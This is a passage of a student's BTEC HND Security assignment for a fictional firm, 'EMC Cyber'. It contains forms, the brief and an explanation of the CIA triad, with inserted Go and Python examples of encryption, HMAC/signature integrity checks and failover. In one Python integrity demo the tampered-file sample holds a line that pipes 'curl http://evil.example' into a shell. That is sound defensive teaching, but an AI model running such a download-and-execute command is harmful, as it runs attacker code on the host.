Security Assignment

The document provides information for an internal verification of assessment decisions for a BTEC Higher National Diploma in Computing program. It details an assessor's evaluation of a student's assignment on the topic of security (Unit 05). The internal verifier checked that the assessment criteria awarded by the assessor matched the assignment brief, and that the pass/merit/distinction grades were justified. The feedback from the assessor to the student was found to be constructive, linked to assessment criteria, and identifying opportunities for improved performance. The internal verifier confirmed no changes were needed to the assessment decision.

Uploaded by

Lenovo Legion
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd

SECURITY

10/12/2022
Unit 05
Higher Nationals
Internal verification of assessment decisions – BTEC (RQF)
INTERNAL VERIFICATION – ASSESSMENT DECISIONS
Programme title: BTEC Higher National Diploma in Computing
Assessor:                                   Internal Verifier:
Unit(s): Unit 05: Security
Assignment title: EMC Cyber
Student’s name:
List which assessment criteria the Assessor has awarded:   Pass   Merit   Distinction
INTERNAL VERIFIER CHECKLIST
Do the assessment criteria awarded match those shown in the assignment brief? Y/N
Is the Pass/Merit/Distinction grade awarded justified by the assessor’s comments on the student work? Y/N
Has the work been assessed accurately? Y/N
Is the feedback to the student:
• Constructive? Y/N
• Linked to relevant assessment criteria? Y/N
• Identifying opportunities for improved performance? Y/N
• Agreeing actions? Y/N
Give details:
Does the assessment decision need amending? Y/N

Assessor signature                                   Date
Internal Verifier signature                          Date
Programme Leader signature (if required)             Date
Confirm action completed
Remedial action taken
Give details:
Assessor signature                                   Date
Internal Verifier signature                          Date
Programme Leader signature (if required)             Date
Higher Nationals - Summative Assignment Feedback Form
Student Name/ID:
Unit Title: Unit 05: Security
Assignment Number: 1                       Assessor:
Submission Date: 2022/10/12                Date Received (1st submission):
Re-submission Date:                        Date Received (2nd submission):
Assessor Feedback:
LO1. Assess risks to IT security
Pass, Merit & Distinction Descriptors: P1 P2 M1 D1

LO2. Describe IT security solutions.
Pass, Merit & Distinction Descriptors: P3 P4 M2 D1

LO3. Review mechanisms to control organisational IT security.
Pass, Merit & Distinction Descriptors: P5 P6 M3 M4 D2

LO4. Manage organisational security.
Pass, Merit & Distinction Descriptors: P7 P8 M5 D3

Grade:                Assessor Signature:                Date:


Resubmission Feedback:

Grade: Assessor Signature: Date:


Internal Verifier’s Comments:

Signature & Date:


* Please note that grade decisions are provisional. They are only confirmed once internal and external moderation has taken place and grade decisions have
been agreed at the assessment board.
Pearson
Higher Nationals in Computing
Unit 5: Security
General Guidelines

1. A cover page or title page – You should always attach a title page to your assignment. Use the previous page as
your cover sheet and make sure all the details are accurately filled in.
2. Attach this brief as the first section of your assignment.
3. All assignments should be prepared using word processing software.
4. All assignments should be printed on A4 sized paper. Use single-sided printing.
5. Allow 1” for the top, bottom and right margins and 1.25” for the left margin of each page.

Word Processing Rules

1. The font size should be 12 point, and the font should be Times New Roman.
2. Use 1.5 line spacing. Left justify all paragraphs.
3. Ensure that all the headings are consistent in terms of the font size and font style.
4. Use footer function in the word processor to insert Your Name, Subject, Assignment No, and Page Number
on each page. This is useful if individual sheets become detached for any reason.
5. Use the word processing application’s spell check and grammar check functions to help edit your assignment.

Important Points:

1. It is strictly prohibited to use textboxes to add text in the assignments, except for the compulsory
information (e.g. figures, tables of comparison, etc.). Adding text boxes in the body, except for the
aforementioned compulsory information, will result in rejection of your work.
2. Carefully check the hand in date and the instructions given in the assignment. Late submissions will not be
accepted.
3. Ensure that you give yourself enough time to complete the assignment by the due date.
4. Excuses of any nature will not be accepted for failure to hand in the work on time.
5. You must take responsibility for managing your own time effectively.
6. If you are unable to hand in your assignment on time and have valid reasons such as illness, you may apply
(in writing) for an extension.
7. Failure to achieve at least PASS criteria will result in a REFERRAL grade.
8. Non-submission of work without valid reasons will lead to an automatic REFERRAL. You will then be asked
to complete an alternative assignment.
9. If you use other people’s work or ideas in your assignment, reference them properly using HARVARD
referencing system to avoid plagiarism. You have to provide both in-text citation and a reference list.
10. If you are proven to be guilty of plagiarism or any academic misconduct, your grade could be reduced to a
REFERRAL or, at worst, you could be expelled from the course.
Student Declaration

I hereby declare that I know what plagiarism entails, namely to use another’s work and to present it as my
own without attributing the sources in the correct way. I further understand what it means to copy another’s
work.

1. I know that plagiarism is a punishable offence because it constitutes theft.
2. I understand the plagiarism and copying policy of Edexcel UK.
3. I know what the consequences will be if I plagiarise or copy another’s work in any of the
assignments for this programme.
4. I declare therefore that all work presented by me for every aspect of my programme will be my
own, and where I have made use of another’s work, I will attribute the source in the correct way.
5. I acknowledge that the attachment of this document, signed or not, constitutes a binding agreement
between myself and Pearson UK.
6. I understand that my assignment will not be considered as submitted if this document is not attached
to the main submission.

Student’s Signature: (Provide E-mail ID)          Date: 2022/10/12 (Provide Submission Date)
Assignment Brief
Student Name / ID Number:
Unit Number and Title: Unit 5: Security
Academic Year: 2020/2021
Unit Tutor:
Assignment Title: EMC Cyber
Issue Date:
Submission Date: 2022/10/12
IV Name & Date:
Submission Format:
The submission should be in the form of an individual written report written in a concise, formal
business style using single spacing and font size 12. You are required to make use of headings,
paragraphs and subsections as appropriate, and all work must be supported with research and
referenced using the Harvard referencing system. Please provide in-text citations and an end list of
references using the Harvard referencing system.

Section 4.2 of the assignment requires a 15-minute presentation to illustrate the answers.

Unit Learning Outcomes:


LO1 Assess risks to IT security.
LO2 Describe IT security solutions.
LO3 Review mechanisms to control organisational IT security.
LO4 Manage organisational security.
Assignment Brief and Guidance:
Scenario

‘EMC Cyber’ is a reputed cyber security company based in Colombo, Sri Lanka, that delivers
security products and services across the entire information technology infrastructure. The company
has a number of clients both in Sri Lanka and abroad, including some of the top-level companies
of the world, serving a multitude of industries. The company develops cyber security software
including firewalls, anti-virus, intrusion detection and protection, and endpoint security. EMC Cyber is
tasked with protecting companies’ networks, clouds, web applications and emails. They also offer
advanced threat protection, secure unified access, and endpoint security. Further, they also play the role
of consulting clients on security threats and how to solve them. Additionally, the company follows
different risk management standards depending on the company, with ISO 31000 being the most
prominent.

One of the clients of EMC Cyber, Lockhead Aerospace Manufacturing, which is a reputed aircraft
manufacturer based in the US, has tasked the company with investigating the security implications of
developing IoT-based automation applications in their manufacturing process. The client has requested
EMC to further audit the security risks of implementing web-based IoT applications in their
manufacturing process and to propose solutions. Further, Lockhead uses ISO standards and has
instructed EMC to use the ISO risk management standards when proposing the solution.

The director of the company understands such a system would be a target for cyber-attacks. As you
are following a BTEC course which includes a unit in security, the director has asked you to
investigate and report on potential cyber security threats to their web site, applications and
infrastructure. After the investigation you need to plan a solution and how to implement it according to
standard software engineering principles.
Activity 01

Assuming the role of External Security Analyst, you need to compile a report for the board of EMC Cyber
focusing on the following elements:

1.1 Identify the CIA Triad concept and evaluate why and how the CIA Triad could be utilized by EMC
Cyber to improve the organization’s security.

1.2 Identify the types of security risks EMC Cyber is subject to in its present setup and the impact that they
would have on the business itself. Evaluate at least three physical and virtual security risks identified
and suggest the security measures that can be implemented in order to improve the organization’s
security.

1.3 Develop and describe security procedures for EMC Cyber to minimize the impact of the issues
discussed in section (1.1) by assessing and rectifying the risks.

Activity 02

2.1 Identify how EMC Cyber and its clients will be impacted by improper/incorrect configurations
of firewalls and VPN solutions. IT security can include a network monitoring
system. Discuss how EMC Cyber can benefit by implementing a network monitoring system, with
supporting reasons.

2.2 Explain how the following technologies would benefit EMC Cyber and its clients by facilitating a
‘trusted network’. (Support your answer with suitable examples.)

i) DMZ

ii) Static IP

iii) NAT

2.3 Identify and evaluate the tools that can be utilized by EMC Cyber to improve network and
security performance without compromising each other. Evaluate at least three virtual and physical
security measures that can be implemented by EMC to uphold the integrity of the organization’s IT policy.

Activity 03

3.1 Discuss suitable risk assessment procedures integrated with enterprise risk management for EMC Cyber
solutions and the impact an IT security audit will have on safeguarding the organization and its clients.
Furthermore, your discussion should include how IT security can be aligned with an organizational IT
policy and how misalignment of such a policy can impact the organization’s security.

(This can include one or more of the following: network change management, audit control, business
continuance/disaster recovery plans, potential loss of data/business, intellectual property, Data
Protection Act; Computer Misuse Act; ISO 31000 standards.)

3.2 Explain the mandatory data protection laws and procedures which will be applied to data storage
solutions provided by EMC Cyber. You should also summarize the ISO 31000 risk management
methodology.

Activity 04

4.1 Design an organizational security policy for EMC Cyber to minimize exploitation and misuse
while evaluating the suitability of the tools used in an organizational policy.

4.2 Develop and present a disaster recovery plan for EMC Cyber according to ISO/IEC
17799:2005 or a similar standard, which should include the main components of an organizational
disaster recovery plan with justifications. Discuss how critical the roles of the stakeholders in the
organization are to successfully implementing the security policy and the disaster recovery plan you
recommended as part of the security audit.

(Students should produce a 15-minute PowerPoint presentation which illustrates the answer for
this section, including justifications and reasons for the decisions and options used.)
Grading Rubric
Grading Criteria                                          Achieved    Feedback

LO1 Assess risks to IT security
P1 Identify types of security risks to organisations.
P2 Describe organizational security procedures.
M1 Propose a method to assess and treat IT security risks.

LO2 Describe IT security solutions
P3 Identify the potential impact to IT security of incorrect configuration of firewall policies and
third-party VPNs.
P4 Show, using an example for each, how implementing a DMZ, static IP and NAT in a
network can improve Network Security.
M2 Discuss three benefits of implementing network monitoring systems, with supporting reasons.
D1 Evaluate a minimum of three physical and virtual security measures that can be employed to
ensure the integrity of organisational IT security.

LO3 Review mechanisms to control organisational IT security
P5 Discuss risk assessment procedures.
P6 Explain data protection processes and regulations as applicable to an organisation.
M3 Summarise the ISO 31000 risk management methodology and its application in IT security.
M4 Discuss possible impacts to organizational security resulting from an IT security audit.
D2 Consider how IT security can be aligned with organisational policy, detailing the security
impact of any misalignment.

LO4 Manage organizational security
P7 Design and implement a security policy for an organisation.
P8 List the main components of an organisational disaster recovery plan, justifying the reasons
for inclusion.
M5 Discuss the roles of stakeholders in the organisation to implement security audit
recommendations.
D3 Evaluate the suitability of the tools used in an organisational policy.

1|Page
Table of Contents
Activity 01..................................................................................................................................5
CIA Triad...................................................................................................................................5
Why should we use CIA triad for EMC Cyber?....................................................................8
How CIA Triad could be utilized to EMC Cyber to improve the organization’s security?...9
Risk..........................................................................................................................................10
Security Risk........................................................................................................................11
EMC CYBER - Security Risks:...........................................................................................11
Physical and Virtual Security Risks.........................................................................................14
Physical Security Risks........................................................................................................14
Virtual Security Risk............................................................................................................16
Vulnerability........................................................................................................................18
Threat...................................................................................................................................20
Security procedures for EMC Cyber to minimize the impact of risks.....................................24
ACTIVITY 02..........................................................................................................................27
Firewall....................................................................................................................................27
Virtual Private Network (VPN)...............................................................................................31
Network Monitoring System....................................................................................................36
Benefits of Implementing a Network Management System to EMC Cyber........................37
Demilitarized Zone (DMZ)......................................................................................................39
Static IP....................................................................................................................................42
Network address translation (NAT).........................................................................................44
How does DMZ, Static IP, NAT help EMC cyber?.................................................................46
Tools to improve the Network of EMC cyber.........................................................................47
Tools to improve the Security of EMC cyber..........................................................................51
Virtual Security Measures implemented by EMC Cyber........................................................53
Physical Security Measures implemented by EMC Cyber......................................................55
Activity 03................................................................................................................................56
Risk Assessment.......................................................................................................................56
Risk assessment Process......................................................................................................57
Risk Assessment Framework...............................................................................................58
Risk Impact and Probability Chart.......................................................................................61
EMC Cyber Risk Impact and Risk Matrix...........................................................................62
EMC CYBER RISK IMPACTS..........................................................................................62

IT Security and Organizational Policy.................................................................................66
Security Audit..........................................................................................................................68
Data protection laws and procedures.......................................................................................71
Data protection Act of 1998.................................................................................................71
Computer Misuse Act of 1990.............................................................................................74
ISO 31000 Risk Management Methodology........................................................................74
Activity 04................................................................................................................................77
Security Policy.........................................................................................................................77
EMC Cyber Security Policy.................................................................................................79
ISO/IEC 17799:2005................................................................................................................99
References..............................................................................................................................100

Table Of Figures
Figure 1 CIA Triad.....................................................................................................................5
Figure 2 Vulnerability..............................................................................................................18
Figure 3 Threats.......................................................................................................................21
Figure 4 Firewall......................................................................................................................27
Figure 5 Firewall and VPN......................................................................................................35
Figure 6 SolarWinds Network Performance Monitor..............................................................48
Figure 7 AUVIK......................................................................................................................49
Figure 8 Datadog Network Performance Monitoring..............................................................50
Figure 9 PRTG Network Monitor............................................................................................51
Figure 10 Risk Probability Chart.............................................................................................61
Figure 11 ISO 31000 Risk Management..................................................................................76
Figure 12 DRP..........................................................................................................................86
Figure 13 DRP contents...........................................................................................................87
Figure 14 DRP company intro.................................................................................................87
Figure 15 Disaster....................................................................................................................88
Figure 16 Disaster recovery plan.............................................................................................88
Figure 17 DRP..........................................................................................................................89
Figure 18 EMC Cyber - DRP...................................................................................................89
Figure 19..................................................................................................................................90
Figure 20..................................................................................................................................90
Figure 21 RTO and RPO..........................................................................................................91
Figure 22..................................................................................................................................91
Figure 23..................................................................................................................................92
Figure 24..................................................................................................................................92
Figure 25 Stakeholders.............................................................................................................93
Figure 26 Types of stakeholders..............................................................................................93
Figure 27 Internal stakeholder.................................................................................................94
Figure 28 Employee.................................................................................................................94

Figure 29 Owner......................................................................................................................95
Figure 30 Manager...................................................................................................................95
Figure 31 External stakeholders...............................................................................................96
Figure 32 Customer..................................................................................................................96
Figure 33 Suppliers..................................................................................................................97
Figure 34 Governments............................................................................................................97
Figure 35 Community..............................................................................................................98
Figure 36 The end....................................................................................................................98

Activity 01
1.1 Identify the CIA Triad concept and evaluate why and how the CIA Triad could be
utilized by EMC Cyber to improve the organization’s security.

CIA Triad
The three letters of the "CIA triad" stand for Confidentiality, Integrity, and Availability.
The CIA triad is a prominent model that serves as the foundation for the design of security
systems. Its three principles are used to identify weaknesses and develop strategies for
addressing them.

The CIA triangle separates these three concepts into distinct focus areas because each is
essential to the running of a business: confidentiality, integrity, and availability of information.
This distinction is useful because it directs security teams towards the different approaches
each concern requires.

When all three requirements have been met, the organization's security posture should be
stronger and better prepared to cope with threat situations.

Figure 1 CIA Triad: the three components Confidentiality, Integrity and Availability.

• Confidentiality
o The efforts made by an organisation to keep data private or hidden are referred
to as confidentiality. To do this, access to information must be restricted to
avoid the deliberate or unintentional sharing of data with unauthorised
parties. Making sure that individuals without the appropriate authority are
barred from accessing assets crucial to your firm is a key part of protecting
confidentiality. At the same time, a good system also makes sure that
individuals who require access have the proper rights.
o Confidentiality can be breached in several ways. This can entail direct
attacks on systems the attacker doesn't have permission to access, or an
attacker attempting to access a database or programme directly in order to
steal or modify data.
o These direct attacks could employ strategies like man-in-the-middle (MITM)
attacks, in which the attacker inserts themselves into the information stream to
intercept data and either take it or modify it. Other kinds of network
eavesdropping are used by some attackers to obtain passwords. To reach the
next level of clearance, the attacker may then try to gain further system
rights.
o However, not all breaches of confidentiality are deliberate. Human error or
inadequate security measures may also be at fault. A password to a
workstation or to a restricted area, for instance, might not be protected.
Users may share their login information with another person or let someone
watch them log in. In some cases, a user's improper encryption of a connection
might allow an attacker to intercept the user's data. Additionally, a thief may
take hardware, such as a whole computer or a device used during the login
process, and use it to access private data.
o You can categorise and label restricted material, set access control policies,
encrypt data, and employ multi-factor authentication (MFA) systems to
combat confidentiality breaches. It is also important to make sure that
everyone in the company has the education and information necessary to
identify threats and steer clear of them.
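The last bullet lists four confidentiality controls: classification labels, access control policies, encryption, and MFA. The following Go program is an added example (not part of this report) that combines them in one read path for a stored record. The classification levels, the "no read up" rule, the MFA requirement for Confidential and above, and the sample record are all constructed for illustration; the encryption is AES-256-GCM from Go's standard library, and the demo key is generated in place where a real service would fetch it from a key management system.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// Level is a classification label, ordered from least to most sensitive
// (constructed for this example; real schemes vary by organisation).
type Level int

const (
	Public Level = iota
	Internal
	Confidential
	Restricted
)

func (l Level) String() string {
	return [...]string{"Public", "Internal", "Confidential", "Restricted"}[l]
}

// Record is a labelled asset stored encrypted; User carries the clearance
// granted by the access control policy and whether MFA was completed.
type Record struct {
	Name  string
	Label Level
	Data  []byte // AES-GCM sealed bytes, nonce prepended
}

type User struct {
	Name      string
	Clearance Level
	MFAPassed bool
}

var ErrDenied = errors.New("access denied")

// Authorize applies two confidentiality rules: a user may only read records
// at or below their clearance ("no read up"), and anything labelled
// Confidential or above additionally requires a completed MFA challenge.
func Authorize(u User, r Record) error {
	if r.Label > u.Clearance {
		return fmt.Errorf("%w: %s (clearance %s) cannot read %s (%s)",
			ErrDenied, u.Name, u.Clearance, r.Name, r.Label)
	}
	if r.Label >= Confidential && !u.MFAPassed {
		return fmt.Errorf("%w: %s must complete MFA to read %s", ErrDenied, u.Name, r.Name)
	}
	return nil
}

// Encrypt seals plaintext with AES-256-GCM so a stolen disk or database dump
// does not expose the data. The random nonce is prepended to the ciphertext.
func Encrypt(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// Decrypt reverses Encrypt; GCM also rejects ciphertext that was tampered with.
func Decrypt(key, sealed []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(sealed) < gcm.NonceSize() {
		return nil, errors.New("ciphertext too short")
	}
	nonce, ct := sealed[:gcm.NonceSize()], sealed[gcm.NonceSize():]
	return gcm.Open(nil, nonce, ct, nil)
}

// ReadRecord is the single path through which stored data is released:
// the policy check runs first, and only then is the record decrypted.
func ReadRecord(key []byte, u User, r Record) ([]byte, error) {
	if err := Authorize(u, r); err != nil {
		return nil, err
	}
	return Decrypt(key, r.Data)
}

func main() {
	key := make([]byte, 32) // demo key only; real keys come from a KMS/HSM
	if _, err := rand.Read(key); err != nil {
		panic(err)
	}
	sealed, _ := Encrypt(key, []byte("IoT controller firmware signing procedure")) // constructed sample
	rec := Record{Name: "iot-signing-sop", Label: Confidential, Data: sealed}

	for _, u := range []User{
		{"analyst", Confidential, true},
		{"analyst-no-mfa", Confidential, false},
		{"contractor", Internal, true},
	} {
		pt, err := ReadRecord(key, u, rec)
		fmt.Printf("%-15s -> %q err=%v\n", u.Name, pt, err)
	}
}
```

Only the first user gets the plaintext; the second is refused for missing MFA and the third for insufficient clearance. Because GCM is an authenticated mode, a record whose ciphertext was altered in storage fails to decrypt instead of returning garbage, which is a useful property when the same control has to cover the integrity of the data as well.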

• Integrity
o Integrity requires ensuring that your data is reliable and unaltered. The
integrity of your data is preserved only if the data is dependable, accurate,
and legitimate.
o Integrity is frequently compromised deliberately. An attacker may get around
an intrusion detection system (IDS), modify file settings to provide
unauthorised access, or manipulate the system's logs to conceal the attack.
Integrity can also be compromised accidentally: someone may carelessly
enter incorrect data or make another error. Additionally, integrity might be
compromised if the business's security rules, safeguards, and processes are
insufficient and no one individual in the organisation is held accountable for
them.
o You can employ hashing, encryption, digital certificates, or digital signatures
to safeguard the integrity of your data. You may use reputable certificate
authorities (CAs) to authenticate your website so that users know they are
accessing the website they intended to visit.
o Non-repudiation, which refers to when something cannot be disputed or
denied, is a technique for confirming integrity. Employees at your
organisation, for instance, cannot deny that an email was sent by them if it has
their digital signature, and the receiver is equally unable to dispute that they
received the email from that sender.
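The two bullets above name hashing and digital signatures as integrity controls and single out log tampering as a way attackers conceal an attack. The Go program below is an added example (not from this report) that protects one IDS log line three ways and shows what each one actually proves: a plain SHA-256 checksum catches accidental corruption but can be recomputed by whoever edits the line; an HMAC under a shared secret cannot be forged without the key but, because both parties hold that key, does not establish who wrote it; an Ed25519 signature can only be produced by the private-key holder, which is the property non-repudiation needs. The log line and the shared secret are constructed for the example; the keys are generated in place.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

// Digest is a plain SHA-256 checksum. It detects accidental corruption, but an
// attacker who alters the data can recompute it, so on its own it says nothing
// about whether the data was tampered with deliberately.
func Digest(data []byte) []byte {
	sum := sha256.Sum256(data)
	return sum[:]
}

// Tag is an HMAC-SHA256 over the data under a shared secret. Without the key
// no valid tag can be produced, so tampering is detected. Sender and receiver
// both hold the key, though, so either could have produced the tag: an HMAC
// gives integrity but not non-repudiation.
func Tag(key, data []byte) []byte {
	mac := hmac.New(sha256.New, key)
	mac.Write(data)
	return mac.Sum(nil)
}

// VerifyTag compares in constant time so timing does not leak the tag.
func VerifyTag(key, data, tag []byte) bool {
	return hmac.Equal(Tag(key, data), tag)
}

// Sign produces an Ed25519 signature with the writer's private key. Anyone
// with the public key can check it, but only the private-key holder could
// have created it, which is what lets the writer be held to the record.
func Sign(priv ed25519.PrivateKey, data []byte) []byte {
	return ed25519.Sign(priv, data)
}

func VerifySignature(pub ed25519.PublicKey, data, sig []byte) bool {
	return ed25519.Verify(pub, data, sig)
}

// CheckLogEntry runs the three checks side by side for one stored entry and
// reports (checksumOK, hmacOK, signatureOK).
func CheckLogEntry(entry, digest, tag, sig, key []byte, pub ed25519.PublicKey) (bool, bool, bool) {
	return bytes.Equal(Digest(entry), digest),
		VerifyTag(key, entry, tag),
		VerifySignature(pub, entry, sig)
}

func main() {
	// Constructed sample: an IDS alert that an intruder would like to downgrade.
	entry := []byte(`2022-10-12T09:14:03Z alert src=10.0.5.17 dst=10.0.1.2 msg="repeated failed logins"`)
	key := []byte("constructed-shared-secret") // demo only; never hard-code real keys
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}

	digest, tag, sig := Digest(entry), Tag(key, entry), Sign(priv, entry)
	c, h, s := CheckLogEntry(entry, digest, tag, sig, key, pub)
	fmt.Printf("original: checksum=%v hmac=%v signature=%v\n", c, h, s)

	// The intruder rewrites the line and recomputes the plain checksum, which
	// is all they can do without the HMAC key or the signing key.
	forged := bytes.Replace(entry, []byte("alert"), []byte("info"), 1)
	c, h, s = CheckLogEntry(forged, Digest(forged), tag, sig, key, pub)
	fmt.Printf("forged:   checksum=%v hmac=%v signature=%v\n", c, h, s)
}
```

For the forged line the checksum still matches while the HMAC and signature both fail, which is why integrity protection for logs, backups and firmware should rest on a keyed MAC or a signature rather than a bare hash stored next to the data. The signature is the only one of the three that also supports the non-repudiation point made in the last bullet.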

• Availability
o Even if data is kept private and its integrity is upheld, it is frequently
meaningless unless it is accessible to the individuals within the business and
the clients they serve. This requires that all systems, networks, and applications
operate properly and at the appropriate times. Additionally, those who have
access to certain information must be able to use it when they need to, and
accessing the data shouldn't take too long.
o Availability will be impacted, for instance, if a power loss occurs without a
disaster recovery strategy in place to help users regain access to crucial
systems. Users may also be unable to reach the workplace due to a natural
disaster like a flood or even a heavy snowfall, which might affect the
accessibility of their workstations and other devices that deliver mission-
critical data or applications. Deliberate sabotage techniques like ransomware
or denial-of-service (DoS) attacks can also jeopardise availability.
o Organizations can use redundant networks, servers, and applications to
guarantee availability. These can be set up to become accessible if the main
system is down or damaged. Keeping software and security systems
updated will also help you increase availability: by doing this, you reduce the
possibility that a programme may malfunction or that recently discovered
malware could penetrate your system. Backups and comprehensive disaster
recovery strategies can also help a business quickly regain availability
following an incident.
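The last bullet describes redundant servers that become accessible when the main system is down. The Go code below is an added example (not part of this report) of the client-side half of that design: a fetch that walks a list of replicas in order, gives each one a bounded time to answer, and moves on when a replica is down or stalls, so a single outage or a replica slowed by a DoS does not take the data away from callers. The `Backend` type, the replica names and the failure behaviours are constructed stand-ins for real service endpoints.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"time"
)

// Backend is one replica of a service. Fetch must honour ctx so a stalled
// replica can be abandoned (constructed abstraction for this example).
type Backend struct {
	Name  string
	Fetch func(ctx context.Context) ([]byte, error)
}

var ErrAllDown = errors.New("all replicas unavailable")

// FetchWithFailover asks replicas in order, giving each at most perTry. A
// replica that errors or fails to answer in time is skipped rather than
// allowed to hold the caller, so availability degrades to the next replica
// instead of to an outage. It returns the data and which replica served it.
func FetchWithFailover(ctx context.Context, replicas []Backend, perTry time.Duration) ([]byte, string, error) {
	var lastErr error
	for _, r := range replicas {
		tryCtx, cancel := context.WithTimeout(ctx, perTry)
		data, err := r.Fetch(tryCtx)
		cancel()
		if err == nil {
			return data, r.Name, nil
		}
		lastErr = fmt.Errorf("%s: %w", r.Name, err)
		if ctx.Err() != nil { // the caller's overall deadline is exhausted
			break
		}
	}
	return nil, "", fmt.Errorf("%w (last error: %v)", ErrAllDown, lastErr)
}

func main() {
	// Constructed replicas: one is down, one never answers in time, one is healthy.
	replicas := []Backend{
		{"dc1-primary", func(ctx context.Context) ([]byte, error) {
			return nil, errors.New("connection refused (power loss)")
		}},
		{"dc1-secondary", func(ctx context.Context) ([]byte, error) {
			select {
			case <-ctx.Done(): // abandoned once perTry elapses
				return nil, ctx.Err()
			case <-time.After(5 * time.Second): // swamped replica, far too slow
				return []byte("late"), nil
			}
		}},
		{"dc2-replica", func(ctx context.Context) ([]byte, error) {
			return []byte("customer records"), nil
		}},
	}

	ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
	defer cancel()
	data, served, err := FetchWithFailover(ctx, replicas, 200*time.Millisecond)
	fmt.Printf("served by %s: %q err=%v\n", served, data, err)
}
```

Run as written, the call returns from `dc2-replica` after roughly 200 ms (the per-try budget spent on the stalled secondary) rather than blocking for five seconds; the per-try timeout is the part that matters, since without it one slow replica would defeat the redundancy the other two provide.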

What Is the Importance of the CIA Triad?

The CIA triad is the primary framework for creating security systems and guidelines for
organisations. As a result, the CIA triad is essential to protecting your data from evolving
cyberthreats. An organization is said to have failed to properly adopt one or more of these
principles if a security incident, such as data theft or a security breach, occurs. The CIA
triad is essential to information security because it improves security posture, assists
enterprises in maintaining compliance with complicated requirements, and supports
business continuity.

Why should we use CIA triad for EMC Cyber?


 The CIA triad offers a straightforward yet thorough high-level checklist for assessing
security controls and equipment. An effective system meets all three requirements of
confidentiality, integrity and availability; an information security system that falls short
on any one of them is inadequate.

 The CIA triad is useful for determining what failed and what held up after an incident.
During a malware attack such as ransomware, for instance, availability may have been
lost while the controls in place still protected the confidentiality of crucial data. That
knowledge can be used to strengthen the weak areas and repeat the strategies that worked.

 The CIA triad should be applied in most security scenarios, since each element is
essential. It is especially useful for building data classification schemes and managing
access rights in EMC Cyber. When dealing with EMC Cyber's vulnerabilities, the triad
should be applied strictly. It is also an effective tool for breaking the Cyber Kill Chain,
the model that describes the stages an attacker works through from reconnaissance to
actions on objectives. Viewing assets through the triad helps identify the likely targets
so that policies and mechanisms can be put in place to secure them appropriately.
 In addition, the CIA triad can be used when training employees in cybersecurity.
Hypothetical scenarios or real-life case studies help employees think in terms of
maintaining the confidentiality, integrity and availability of information and systems.

How CIA Triad could be utilized to EMC Cyber to improve the organization’s
security?
Confidentiality

 Classify the assets and data being managed according to the applicable privacy rules.
 Make multi-factor authentication and data encryption (at rest and in transit) core parts
of the security procedures.
 Review and update file permissions and access control lists regularly, so that only the
correct users or services are granted access to a given resource.
 Give employees privacy training that is both generic and role specific.

Integrity

 Examine each method used for data processing, transport and storage.
 Version control, audit logs, granular access control and checksums all help to ensure
integrity. Cryptographic hash functions detect corruption or tampering; a keyed hash
(HMAC) or digital signature also stops an attacker from recomputing the checksum
after altering the data.
 Understand the legal and regulatory obligations of the company. For example, the
GDPR only permits transfers of personal data to third parties or suppliers outside the
EU if adequate protection or appropriate safeguards and legal measures are in place.
 Invest in a reliable backup and recovery solution that guarantees business continuity
and prompt data recovery in the event of a security incident or data breach.
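To make the checksum and keyed-hash point concrete, here is an added example (not part of the original assignment) that builds a SHA-256 manifest of a set of files and seals it with an HMAC, then verifies the files against it. The file contents and the manifest key are constructed for illustration; in practice the key would be held in a secrets store and the files read from disk.

```python
import hashlib
import hmac
import json

# Constructed stand-ins for files on disk (name -> content).
SAMPLE_FILES = {
    "config/app.yaml": b"db_host: db.internal\ndebug: false\n",
    "bin/deploy.sh": b"#!/bin/sh\nrsync -a build/ prod:/srv/app/\n",
}
# Assumption: the manifest key lives in a secrets store, not next to the files.
MANIFEST_KEY = b"example-manifest-key-do-not-use"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _mac(key: bytes, digests: dict) -> str:
    # Canonical JSON so the MAC does not depend on dictionary ordering.
    body = json.dumps(digests, sort_keys=True).encode()
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def build_manifest(files: dict, key: bytes) -> dict:
    """Record a SHA-256 per file, then seal the list of digests with an HMAC.

    A bare checksum only catches accidental corruption: whoever can change a
    file can recompute its hash. The HMAC, keyed with a secret the attacker
    does not hold, also catches a rewritten manifest.
    """
    digests = {name: sha256_hex(data) for name, data in sorted(files.items())}
    return {"digests": digests, "mac": _mac(key, digests)}


def verify(files: dict, manifest: dict, key: bytes) -> list:
    """Return a list of integrity problems; an empty list means everything checks out."""
    problems = []
    if not hmac.compare_digest(_mac(key, manifest["digests"]), manifest["mac"]):
        problems.append("manifest: MAC mismatch")
    for name, digest in manifest["digests"].items():
        if name not in files:
            problems.append(f"{name}: missing")
        elif not hmac.compare_digest(sha256_hex(files[name]), digest):
            problems.append(f"{name}: content changed")
    for name in files:
        if name not in manifest["digests"]:
            problems.append(f"{name}: unexpected new file")
    return problems


if __name__ == "__main__":
    manifest = build_manifest(SAMPLE_FILES, MANIFEST_KEY)
    tampered = {**SAMPLE_FILES, "bin/deploy.sh": b"#!/bin/sh\ncurl http://evil.example | sh\n"}
    print("clean:", verify(SAMPLE_FILES, manifest, MANIFEST_KEY))
    print("tampered:", verify(tampered, manifest, MANIFEST_KEY))
```

Run it as a script to see the clean set pass and the altered deploy script flagged. A forged manifest built without the key fails the MAC check even though its per-file digests match the altered files.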

Availability

 Build preventative measures into the system architecture, such as redundancy,
failover and RAID (redundant array of independent disks). Carry out regular security
audits, and update systems, network devices and applications automatically or on a
fixed schedule.
 Use detection technologies such as anti-malware software and network/server
monitoring.
 Recognise that downtime can occur even on well-protected SaaS systems and
